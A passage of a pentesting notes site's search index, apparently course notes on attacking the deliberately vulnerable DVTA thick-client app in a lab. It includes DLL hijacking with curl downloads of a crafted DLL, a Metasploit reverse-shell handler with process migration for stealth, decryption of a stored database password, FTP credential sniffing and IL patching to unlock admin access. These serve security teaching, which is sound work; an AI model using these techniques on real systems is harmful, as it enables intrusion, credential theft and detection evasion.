                                  curl http://10.0.2.15/SECUR32.dll --output C:\\Users\\admin\\Desktop\\SECUR32.dll\ncurl http://10.0.2.15/SECUR32.dll --output C:\\Users\\admin\\Desktop\\Dwrite.dll\n
                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#3-launching-the-attack","title":"3. Launching the attack","text":"

                                  Place the DLL crafted file into the same folder than the application. In my case I will place DWrite.dll into

                                  C:\\Users\\admin\\Desktop\\tools\\original\n

                                  In the Kali machine, start metasploit and set a handler:

                                  msfconsole\n
                                  use exploit/multi/handle\nset payload windows/meterpreter/reverse_tcp\nset LHOST 10.0.2.15\nset LPORT 4444\nrun\n

                                  Now you can start the application in the windows machine, and on the listener handler in kali, you will get a meterpreter.

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#4-moving-your-meterpreter-to-a-different-process","title":"4. Moving your meterpreter to a different process","text":"

                                  List all processes in the meterpreter and migrate to a less suspicious one. This will also unblock the DVTA app in the windows machine:

                                  ps\nmigrate <ID>\n
                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#how-to-connect-to-a-database-after-getting-the-credentials","title":"How to connect to a database after getting the credentials","text":"","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-basic-lab-setup/","title":"Basic Lab Setup - Thick client Applications","text":"

                                  General index of the course

                                  • Introduction.
                                  • Tools for pentesting thick client applications.
                                  • Basic lab setup.
                                  • First challenge: enabling a button.
                                  • Information gathering phase.
                                  • Traffic analysis.
                                  • Attacking thick clients applications.
                                  • Reversing and patching thick clients applications.
                                  • Common vulnerabilities.
                                  ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#environment-description","title":"Environment description","text":"
                                  • VirtualBox or VMWare Installation workstation.
                                  • Windows 10 VM 1 (database) -> SQL server.
                                  • (optional) Windows 10 VM 2 (client) -> DVTA.

                                  In the course we will be using an unique Windows 10 machine with both the SQL server and the DVTA application installed. Therefore, there will not be the need to have a second Windows 10 VM since all the needed applications will be installed on this unique virtual machine.

                                  ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#software-resources","title":"Software resources","text":"
                                  • Get windows 10 iso from: Repo for legacy Operating system.
                                  • Damn Vulnerable Thick Client Application DVTA (modified version given in the course): https://drive.google.com/open?id=1u46XDgVpCiN6eGAjILnhxsGL9Pl2qgcD.
                                  • SQL Server Express 2008: SQL Server\u00ae 2008 R2 SP2.
                                  • SQL Server Management Studio SQL Server Management Studio (SSMS).
                                  • Filezilla FTP Server: FileZilla Server for Windows (64bit x86) (filezilla-project.org).

                                  Now, open the Windows 10 VM and start the lab setup!

                                  ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#1-install-sql-server-express-2008","title":"1. Install SQL Server Express 2008","text":"

                                  In the Download page we will choose SQLEXPR_x64_ENU.exe.

                                  Some helpful tips and screenshots about the installation:

                                  ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#2-install-sql-server-management-studio-1901","title":"2. Install SQL Server Management Studio 19.0.1","text":"

                                  This installation is pretty straighforward. Download page

                                  ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#creating-database-dtva-four-our-vuln-thick-app","title":"Creating database DTVA four our vuln thick app","text":"

                                  We will create the database \"DVTA\" and we will populate it with some users and expenses:

                                  1. Open SSMS (SQL Server Management Studio) and right click on the \"Database\" object, and create a new database called DVTA.

                                  2. Create a new table \"users\" in the database DVTA.

                                  Here is the query:

                                  CREATE TABLE \"users\" (\n    \"id\" INT IDENTITY(0,1) NOT NULL,\n    \"username\" VARCHAR(100) NOT NULL,\n    \"password\" VARCHAR(100) NOT NULL,\n    \"email\" VARCHAR(100) NULL DEFAULT NULL,\n    \"isadmin\" INT NULL DEFAULT '0',\n    PRIMARY KEY (\"id\")\n)\n

                                  3. Populate the database with 3 given users:

                                  Here is the query:

                                  INSERT INTO dbo.users (username, password, email, isadmin)\nVALUES\n('admin','admin123','admin@damnvulnerablethickclientapp.com',1),\n('rebecca','rebecca','rebecca@test.com',0),\n('raymond','raymond','raymond@test.com',0);\n

                                  4. Create the table \"expenses\" in the database DVTA.

                                  Here is the query:

                                  CREATE TABLE \"expenses\" (\n    \"id\" INT IDENTITY(0,1) NOT NULL,\n    \"email\" VARCHAR(100) NOT NULL,\n    \"item\" VARCHAR(100) NOT NULL,\n    \"price\" VARCHAR(100) NOT NULL,\n    \"date\" VARCHAR(100) NOT NULL,\n    \"time\" VARCHAR(100) NULL DEFAULT NULL,\n    PRIMARY KEY (\"id\")\n)\n
                                  ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#adittional-configurations","title":"Adittional configurations","text":"

                                  Some configurations need to be done so the conection works:

                                  1. Open SQL Server Configuration Manager and enable TCP/IP Protocol conections:

                                  2. Also in SQL Server Configuration Manager, restart SQL Server (SQLEXPRESS)

                                  ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#3-install-filezilla-ftp-server","title":"3. Install Filezilla FTP server","text":"

                                  1. Download Filezilla Server, install it and initiate a connection: Download page

                                  As for the conection initiation, I'm using localhost 127.0.0.1, port 14148 and password \"filezilla\":

                                  2. Add a user. Name \"dvta\" and password \"p@ssw0rd\"

                                  3. Add a Shared folder. Be careful with slashes and backslashes (wink!) not to get the typical error \"error on row number 1 virtual path must be absolute\".

                                  ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-common-vulnerabilities/","title":"Common vulnerabilities","text":"

                                  General index of the course

                                  • Introduction.
                                  • Tools for pentesting thick client applications.
                                  • Basic lab setup.
                                  • First challenge: enabling a button.
                                  • Information gathering phase.
                                  • Traffic analysis.
                                  • Attacking thick clients applications.
                                  • Reversing and patching thick clients applications.
                                  • Common vulnerabilities.
                                  ","tags":["thick client applications","thick client applications pentesting","binscope","visual code grepper"]},{"location":"thick-applications/tca-common-vulnerabilities/#application-signing","title":"Application Signing","text":"

                                  For checking if the application is signed, we use the tool sigcheck, from SysInternals Suite.

                                  From command line we run sigcheck.exe and check if DVTA.exe is signed.

                                  ","tags":["thick client applications","thick client applications pentesting","binscope","visual code grepper"]},{"location":"thick-applications/tca-common-vulnerabilities/#compiler-protection","title":"Compiler protection","text":"

                                  We will use the tool binscope, provided by Microsoft.

                                  Download it from: https://www.microsoft.com/en-us/download/details.aspx?id=44995

                                  Install it by double-clicking on it.

                                  Now from command line:

                                  .\\binscope.exe /verbose /html /logfile c:/path/to/outputreport.html C:/path/to/application/toAudit/DVTA.exe\n

                                  After executing the command you will obtain a report of some basic checks that binscope run on the application.

                                  ","tags":["thick client applications","thick client applications pentesting","binscope","visual code grepper"]},{"location":"thick-applications/tca-common-vulnerabilities/#automated-source-code-scanning","title":"Automated source code scanning","text":"","tags":["thick client applications","thick client applications pentesting","binscope","visual code grepper"]},{"location":"thick-applications/tca-common-vulnerabilities/#visual-code-grepper","title":"Visual Code Grepper","text":"

                                  Download it from: https://sourceforge.net/projects/visualcodegrepp/

                                  To run a scan:

                                  1. Open the application in dotpeek and export it as a visual Studio project. This will export the decompiled code of the application where we indicate.

                                  2. Open Visual Code Grepper. In menu FILE, first option, specify the target directory (where we saved the decompiled files). If error message says that \"no files for the specified language\", change language in menu Settings (C#).

                                  3. Click on menu Scan> Full scan.

                                  ","tags":["thick client applications","thick client applications pentesting","binscope","visual code grepper"]},{"location":"thick-applications/tca-first-challenge/","title":"First challenge: enabling a button","text":"

                                  General index of the course

                                  • Introduction.
                                  • Tools for pentesting thick client applications.
                                  • Basic lab setup.
                                  • First challenge: enabling a button.
                                  • Information gathering phase.
                                  • Traffic analysis.
                                  • Attacking thick clients applications.
                                  • Reversing and patching thick clients applications.
                                  • Common vulnerabilities.

                                  One thing is still missing after the Basic lab setup: launching the application and making sure that it works. If we proceed, sooner than later we will see that one thing is left to be done before starting to use DVTA app: Setting up the server in the vulnerable app (DVTA).

                                  ","tags":["thick client applications","thick client applications pentesting","dnspy"]},{"location":"thick-applications/tca-first-challenge/#the-problem-a-button-is-not-working","title":"The problem: a button is not working","text":"

                                  If we launch the vulnerable app, DVTA, we will check that the button labelled as \"Configure Server\" is not enable. We will use the tool dnspy to enable that button.

                                  ","tags":["thick client applications","thick client applications pentesting","dnspy"]},{"location":"thick-applications/tca-first-challenge/#using-dnspy-to-see-and-modify-compiled-code","title":"Using dnspy to see and modify compiled code","text":"

                                  1. We will use dnspy 32 bit version, since dvta is a 32 bit app. Open the version 32 bit of dnspy, and go to FILE > Open > [Select de DVTA.exe file] and you will see it in the sidebar of dnspy:

                                  2. Expand DVTA, go to the decompiled object that is being used in the login and read the code. You will see the function isserverConfigured(). Also in the opening tooltip you can read that this function is receiving a BOOLEAN value.

                                  3. Edit the function in IL instructions

                                  4. Modify the value of the boolean in the IL instruction.

                                  5. Save the module.

                                  6. Now when you open the DVTA application the button will be enabled and we will be able to setup the server. Our server is going to be that one of the database that we just configure for our application (127.0.0.1).

                                  ","tags":["thick client applications","thick client applications pentesting","dnspy"]},{"location":"thick-applications/tca-first-challenge/#making-sure-that-it-works","title":"Making sure that it works","text":"

                                  If we browse the configuration file (DVTA.exe.Config) we will see that the configuration has taken place:

                                  ","tags":["thick client applications","thick client applications pentesting","dnspy"]},{"location":"thick-applications/tca-information-gathering-phase/","title":"Information gathering phase - Thick client Applications","text":"

                                  General index of the course

                                  • Introduction.
                                  • Tools for pentesting thick client applications.
                                  • Basic lab setup.
                                  • First challenge: enabling a button.
                                  • Information gathering phase.
                                  • Traffic analysis.
                                  • Attacking thick clients applications.
                                  • Reversing and patching thick clients applications.
                                  • Common vulnerabilities.
                                  ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#what-we-will-be-doing","title":"What we will be doing","text":"

                                  1. Understand the functionality of the application.

                                  2. Architecture diagram from the client.

                                  3. Network communications in the app.

                                  4. Files that are being accessed by the client.

                                  5. Interesting files within the application directory.

                                  Tools: CFF explorer, wireshark, and sysInternalsSuite.

                                  ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#ip-addresses-that-the-app-is-communicating-with","title":"IP addresses that the app is communicating with","text":"","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#tcp-view","title":"TCP View","text":"

                                  To see which IP addresses is the app communicating with, we can use TCP View from sysInternalsSuite.

                                  ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#wireshark","title":"Wireshark","text":"

                                  We can also use wireshark

                                  ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#language-in-which-the-app-is-built-in","title":"Language in which the app is built in","text":"","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#cff-explorer","title":"CFF Explorer","text":"

                                  To see which language is the app build in, and which tool was used, we can use CFF explorer. Open the app with CFF Explorer.

                                  ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#changes-in-the-filesystem","title":"Changes in the FileSystem","text":"","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#procesmonitor","title":"ProcesMonitor","text":"

                                  Use ProcessMonitor tool from sysInternalsSuite to see changes in the file system.

                                  For instance, you can analyze the access to interesting files in the application directory. Now we have this information:

                                  <add key=\"DBSERVER\" value=\"127.0.0.1\\SQLEXPRESS\" />\n<add key=\"DBNAME\" value=\"DVTA\" />\n<add key=\"DBUSERNAME\" value=\"sa\" />\n<add key=\"DBPASSWORD\" value=\"CTsvjZ0jQghXYWbSRcPxpQ==\" />\n<add key=\"AESKEY\" value=\"J8gLXc454o5tW2HEF7HahcXPufj9v8k8\" />\n<add key=\"IV\" value=\"fq20T0gMnXa6g0l4\" />\n<add key=\"ClientSettingsProvider.ServiceUri\" value=\"\" />\n<add key=\"FTPSERVER\" value=\"127.0.0.1\" />\n
                                  ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#locate-credentials-and-information-in-registry-entries","title":"Locate credentials and information in Registry entries","text":"","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#processmonitor","title":"ProcessMonitor","text":"

                                  Using ProccessMonitor from sysInternalsSuite to locate credentials and information stored in the key registers. And for that, after cleaning all the processes in ProcMon (ProcessMonitor app), you close the application and reopen it.

                                  If the session is still there, it means that the session is saved somewhere. In this case the session is saved in the registry keys.

                                  Interesting thing here is the Registry Key \"isLoggedIn\". We could try to modify the boolean value of that registry to bypass login.

                                  Also, check these other tools and resources:

                                  • WinSpy.
                                  • Window Detective
                                  • netspi.com.
                                  ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#enumerate-libraries-and-resources-employed-in-building-the-app","title":"Enumerate libraries and resources employed in building the app","text":"

                                  When pentesting a thick-client application, I came across this nice way to enumerate libraries, dependencies, sources... By using Sigcheck from sysInternalsSuite, you can view metadata from the images with executables. Additionally, you can save the results to a CSV for reporting purposes.

                                  .\\sigcheck.exe -nobanner -s -e <folder/binaryFile>\n# -s: Search recursively, useful for thick client apps with lot of folders and subfolders\n# -e: Scan executable images only (regardless of their extension)\n# -nobanner:    Do not display the startup banner and copyright message.\n

                                  One cool flag is the recursive one (\"-s\"), which helps you avoid navigating through the folder structure.

                                  ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-reversing-and-patching/","title":"Reversing and patching thick clients applications","text":"

                                  General index of the course

                                  • Introduction.
                                  • Tools for pentesting thick client applications.
                                  • Basic lab setup.
                                  • First challenge: enabling a button.
                                  • Information gathering phase.
                                  • Traffic analysis.
                                  • Attacking thick clients applications.
                                  • Reversing and patching thick clients applications.
                                  • Common vulnerabilities.
                                  ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#reversing-net-applications","title":"Reversing .NET applications","text":"","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#required-software","title":"Required software","text":"
                                  • dnspy: c# code + IL code + patching the application
                                  • dotPeek (from JetBrains)
                                  • ILspy / Reflexil
                                  • ILASM (IL Assembler) (comes with .NET Framework).
                                  • ILDASM (IL Disassembler) (comes with Visual Studio).

                                  IL stands for Intermediate Language.

                                  ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#installing-visual-studio-community-2019-version-1611","title":"Installing Visual Studio Community 2019 (version 16.11)","text":"

                                  Download from: https://my.visualstudio.com/Downloads?q=Visual%20Studio%202019

                                  ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#installing-dotpeek","title":"Installing dotPeek","text":"

                                  dotPeek Cheatsheet Download from: https://www.jetbrains.com/es-es/decompiler/download/#section=web-installer

                                  ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#decompiling-with-dotpeek-executing-with-visual-studio","title":"decompiling with dotPeek + executing with Visual Studio","text":"

                                  We will try to decompile the app using dotPeek to decrypt the database connection. Remember from the config file

                                        <add key=\"DBPASSWORD\" value=\"CTsvjZ0jQghXYWbSRcPxpQ==\" />\n      <add key=\"AESKEY\" value=\"J8gLXc454o5tW2HEF7HahcXPufj9v8k8\" />\n      <add key=\"IV\" value=\"fq20T0gMnXa6g0l4\" />\n

                                  (The config file was DVTA.exe.Config, located in the same directory as the app).

                                  We will use dotpeek + Visual Studio to understand the logic under that connection.

                                  Open the app DVTA from dotpeek, go to DVTA>References>DBAccess and double click it. Then you will get a Resource uploaded with the name > DBAccess Class. In it there is a function called decryptPassword()

                                  public string decryptPassword()\n    {\n      string s1 = ConfigurationManager.AppSettings[\"DBPASSWORD\"].ToString();\n      string s2 = ConfigurationManager.AppSettings[\"AESKEY\"].ToString();\n      string s3 = ConfigurationManager.AppSettings[\"IV\"].ToString();\n      byte[] inputBuffer = Convert.FromBase64String(s1);\n      AesCryptoServiceProvider cryptoServiceProvider = new AesCryptoServiceProvider();\n      cryptoServiceProvider.BlockSize = 128;\n      cryptoServiceProvider.KeySize = 256;\n      cryptoServiceProvider.Key = Encoding.ASCII.GetBytes(s2);\n      cryptoServiceProvider.IV = Encoding.ASCII.GetBytes(s3);\n      cryptoServiceProvider.Padding = PaddingMode.PKCS7;\n      cryptoServiceProvider.Mode = CipherMode.CBC;\n      this.decryptedDBPassword = Encoding.ASCII.GetString(cryptoServiceProvider.CreateDecryptor(cryptoServiceProvider.Key, cryptoServiceProvider.IV).TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));\n      Console.WriteLine(this.decryptedDBPassword);\n      return this.decryptedDBPassword;\n

                                  So we will open Visual Studio and we will create a New Project, a Windows Form Application (.NET Framework). We will call the project PasswordDecryptor. Create a button. Name it Decrypt.

                                  By double-clicking on the Decrypt button we will be taken to the Source code of that button.

                                  This is what we are going to put in that button:

                                  using System;\nusing System.Collections.Generic;\nusing System.ComponentModel;\nusing System.Data;\nusing System.Drawing;\nusing System.Linq;\nusing System.Text;\nusing System.Threading.Tasks;\nusing System.Windows.Forms;\nusing System.Security.Cryptography;\n\nnamespace decryptorpassword\n{\n    public partial class Decrypt : Form\n    {\n        public Decrypt()\n        {\n            InitializeComponent();\n        }\n\n        private void button1_Click(object sender, EventArgs e)\n        {\n            string dbpassword = \"CTsvjZ0jQghXYWbSRcPxpQ==\";\n            string  aeskey = \"J8gLXc454o5tW2HEF7HahcXPufj9v8k8\";\n            string iv = \"fq20T0gMnXa6g0l4\";\n            byte[] inputBuffer = Convert.FromBase64String(dbpassword);\n            AesCryptoServiceProvider cryptoServiceProvider = new AesCryptoServiceProvider();\n            cryptoServiceProvider.BlockSize = 128;\n            cryptoServiceProvider.KeySize = 256;\n            cryptoServiceProvider.Key = Encoding.ASCII.GetBytes(aeskey);\n            cryptoServiceProvider.IV = Encoding.ASCII.GetBytes(iv);\n            cryptoServiceProvider.Padding = PaddingMode.PKCS7;\n            cryptoServiceProvider.Mode = CipherMode.CBC;\n            string decryptedDBPassword = Encoding.ASCII.GetString(cryptoServiceProvider.CreateDecryptor(cryptoServiceProvider.Key, cryptoServiceProvider.IV).TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));\n            Console.WriteLine(decryptedDBPassword);\n        }\n    }\n}\n

                                  Some things not said in the video: it's quite possible you will need to debug this simple application. For that, the best thing to do is reading error messages and try to fix them. In my case, a basic library for the execution of this code was missing:

                                  using System.Security.Cryptography;\n

                                  Also, it was needed to rename the .exe output file in the Main() function like this

                                  # what it said\n  Application.Run(new Form1());\n# what it needed to say to match to my code\n  Application.Run(new Decrypt());\n
                                  ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#decompiling-and-executing-with-dnspy","title":"Decompiling and executing with dnspy","text":"

                                  1. Open the application in dnspy. Go to Login. Click on namespace DBAccess

                                  2. Click on DBAccessClass

                                  3. Locate the function decryptPassword(). That's the one we would love to run. For that locate where it is called from. Add a Breakpoint there. Run the code. You will be asked about which executable to run (select DVTA.exe). After that, the code will be executed up to the breakpoint. Enter credentials and see in the Notification area how variables are being called.

                                  Eventually, you will see the decrypted connection string in those variables. You can add more breakpoints.

                                  ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#using-ilspy-reflexil-to-patch-applications","title":"Using ILSpy + Reflexil to patch applications","text":"","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#ilspy-setup","title":"ILSpy Setup","text":"

                                  Repository: https://github.com/icsharpcode/ILSpy/releases

                                  Requirements: .NET 6.0. Download zip to tools. Place the file ILSpy_binaries_8.0.0.7246-preview3.zip into the tool folder and extract files.

                                  ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#setup-reflexil-plugin-in-ilspy","title":"Setup Reflexil plugin in ILSpy","text":"

                                  1. Download from: https://github.com/sailro/Reflexil/releases

                                  2. Place the file reflexil.for.ILSpy.2.7.bin into tools and extract files.

                                  3. Enter the Reflexil folder and copy the .dll file Reflexil.ILSpy.Plugin.dll.

                                  4. Place it into ILSpy directory. Now the plugin is installed.

                                  ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#patching-with-ilspy-reflexil","title":"Patching with ILSpy + Reflexil","text":"

                                  One interesting thing about ILSpy (different from other tools) is that you can see code in 3 modes: IL, C# and the combined mode, C# + IL. This last mode comes in hand to be able to interpretate much better what the code is about.

                                  1. Open DVTA app from ILSpy and locate this code:

                                  Access to the admin pannel is decided with an IF statement and a integer variable set to 0/1. We will modify this value using ILSpy + Reflexil and patch again the application.

                                  2. Open Reflexil plugin:

                                  3. In the Reflexil pannel, look for the specific instruction (the one that moves to the pile the value 1) and change the value to 0.

                                  4. Save the changes in your DVTA application with a different name:

                                  5. When opening the new saved application, you will access admin pannel even if you login with normal user credentials.

                                  ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#using-ilasm-and-ldasm-to-patch-applications","title":"Using ilasm and ldasm to patch applications","text":"

                                  ilasm (IL assembler) and ldasm (il disasembler) are tools provided by Microsoft in Visual Studio.

                                  We will use ILDASM to disasembler the DVTA application

                                  C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v10.0A\\bin\\NETFX 4.8 Tools\\ildasm.exe\n

                                  And ILASM to assemble again the application:

                                  C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ilasm.exe\n

                                  1. Open DVTA.exe with ILDASM.exe from command line:

                                  2. Dump the folder. FILES> Dump

                                  3. Save that dumped code (which will be IL) into a folder. Close the ILDASM application. The folder generated contains the IL code. There is an specific file called DVTA.il

                                  4. Open DVTA.il in a text editor and modify the instruction you want to modify. In our case we will change \"ldc.i4.1\" to \"ldc.i4.0\".

                                  5. From command line, we will use ILASM to assemble that DVTA.il file into a new application

                                  cd C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\n.\\ilasm.exe C:\\User\\lala\\Desktop\\RE\\DVTA.il\n
                                  ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#anti-piracy-measures-implemented-by-some-apps","title":"Anti piracy measures implemented by some apps","text":"

                                  Mechanism to track or prevent illegitimate copying or usage of the software:

                                  • Does the app use serial keys, or License Keys to ensure that only allowed number of users can load and operate the software?
                                  • Does the application stop operating after the expiration of license or serial key?
                                  • \u2022 Tracking back the legitimate and illegitimate usage of the application
                                  ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-traffic-analysis/","title":"Traffic analysis - Thick client Applications","text":"

                                  General index of the course

                                  • Introduction.
                                  • Tools for pentesting thick client applications.
                                  • Basic lab setup.
                                  • First challenge: enabling a button.
                                  • Information gathering phase.
                                  • Traffic analysis.
                                  • Attacking thick clients applications.
                                  • Reversing and patching thick clients applications.
                                  • Common vulnerabilities.
                                  ","tags":["thick client applications","thick client applications pentesting","burpsuite","echo mirage","mitm relay","wireshark"]},{"location":"thick-applications/tca-traffic-analysis/#tools-needed","title":"Tools needed","text":"
                                  • BurpSuite
                                  • Echo mirage, very old and not maintained.
                                  • mitm_relay
                                  • Wireshark

                                  Difficult part here is when the thick app is not using http/https protocol. In that case, BurpSuite alone is out of consideration and we will need to use:

                                  • wireshark, it's ok if we just want to monitor.
                                  • Echo mirage, very old and not maintained.
                                  • mitm_relay + BurpSuite.
                                  ","tags":["thick client applications","thick client applications pentesting","burpsuite","echo mirage","mitm relay","wireshark"]},{"location":"thick-applications/tca-traffic-analysis/#traffic-monitoring-with-wireshark","title":"Traffic monitoring with Wireshark","text":"

                                  1. We make sure that port 21 is listening in the Filezilla Server.

                                  And we start the capture with Wireshark. We will open DVTA with admin credentials and we will click on \"Back up Data to the FTP Server\". If we filter the capture in wireshark leaving only FTP traffic we will be able to retrieve user and password in plain text:

                                  ","tags":["thick client applications","thick client applications pentesting","burpsuite","echo mirage","mitm relay","wireshark"]},{"location":"thick-applications/tca-traffic-analysis/#traffic-monitoring-with-echo-mirage","title":"Traffic monitoring with Echo mirage","text":"

                                  1. Open Echo Mirage and add a rule to intercept all inbound and outbound traffic in port 21.

                                  2. In TAB \"Process\" > Inject, and select the application.

                                  3. In the vulnerable app DVTA login as admin and click on action \"Backup Data to FTP Server\". Now in Echo Mirage you will be intercepting the traffic. This way we can capture USER and PASSWORD:

                                  Also, modifying the payload you will be tampering the request.

                                  ","tags":["thick client applications","thick client applications pentesting","burpsuite","echo mirage","mitm relay","wireshark"]},{"location":"thick-applications/tca-traffic-analysis/#traffic-monitoring-with-mitm_relay-burpsuite","title":"Traffic monitoring with mitm_relay + Burpsuite","text":"

                                  In DVTA we will configure the server to the IP of the local machine. In my lab setup, my IP was 10.0.2.15.

                                  In FTP, we will configure the listening port to 2111. Also, we will disable IP check for this lab setup to work.

                                  From https://github.com/jrmdev/mitm_relay:

                                  This is what we're doing:

                                  1. DVTA application sends traffic to port 21, so to intercept it we configure MITM_relay to be listening on port 21.

                                  2. mitm_relay encapsulates the application traffic (no matter the protocol) into HTTP protocol so BurpSuite can read it.

                                  3. Burp Suite will read the traffic. And we can tamper here our code.

                                  4. mitm_relay will \"unfunnel\" the traffic from the HTPP protocol into the raw one.

                                  5. In a lab setup FTP server will be in the same network, so to not get in conflict with mitm_relay we will modify FTP listen port to 2111. In real life this change is not necessary

                                  Running mitm_relay:

                                  python mitm_relay.py -l 0.0.0.0 -r tcp:21:10.0.2.15:2111 -p 127.0.0.1:8080\n# -l listening address for mitm_relay (0.0.0.0 means we all listening in all interfaces)\n# -r relay configuration: <protocol>:<listeningPort>:<IPofDestinationserver>:<listeningPortonDestinationServer>\n# -p Proxy configuration: <IPofProxy>:<portOfProxy> \n

                                  And this is how the interception looks like:

                                  ","tags":["thick client applications","thick client applications pentesting","burpsuite","echo mirage","mitm relay","wireshark"]},{"location":"thick-applications/thick-application-checklist/","title":"Thick client Applications Pentesting Checklist","text":"

                                  Source

                                  ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#information-gathering","title":"Information gathering","text":"
                                  **Information Gathering**\n\n- [ ]  Find out the application architecture (two-tier or three-tier)\n- [ ]  Find out the technologies used (languages and frameworks)\n- [ ]  Identify network communication\n- [ ]  Observe the application process\n- [ ]  Observe each functionality and behavior of the application\n- [ ]  Identify all the entry points\n- [ ]  Analyze the security mechanism (authorization and authentication)\n\n**Tools Used**\n\n- [ ]  CFF Explorer\n- [ ]  Sysinternals Suite\n- [ ]  Wireshark\n- [ ]  PEid\n- [ ]  Detect It Easy (DIE)\n- [ ]  Strings\n
                                  ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#gui-testing","title":"GUI testing","text":"
                                  **Test For GUI Object Permission**\n\n- [ ]  Display hidden form object\n- [ ]  Try to activate disabled functionalities\n- [ ]  Try to uncover the masked password\n\n**Test GUI Content**\n\n- [ ]  Look for sensitive information\n\n**Test For GUI Logic**\n\n- [ ]  Try for access control and injection-based vulnerabilities\n- [ ]  Bypass controls by utilizing intended GUI functionality\n- [ ]  Check improper error handling\n- [ ]  Check weak input sanitization\n- [ ]  Try privilege escalation (unlocking admin features to normal users)\n- [ ]  Try payment manipulation\n\n**Tools Used**\n\n- [ ]  UISpy\n- [ ]  Winspy++\n- [ ]  Window Detective\n- [ ]  Snoop WPF\n
                                  ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#file-testing","title":"File testing","text":"
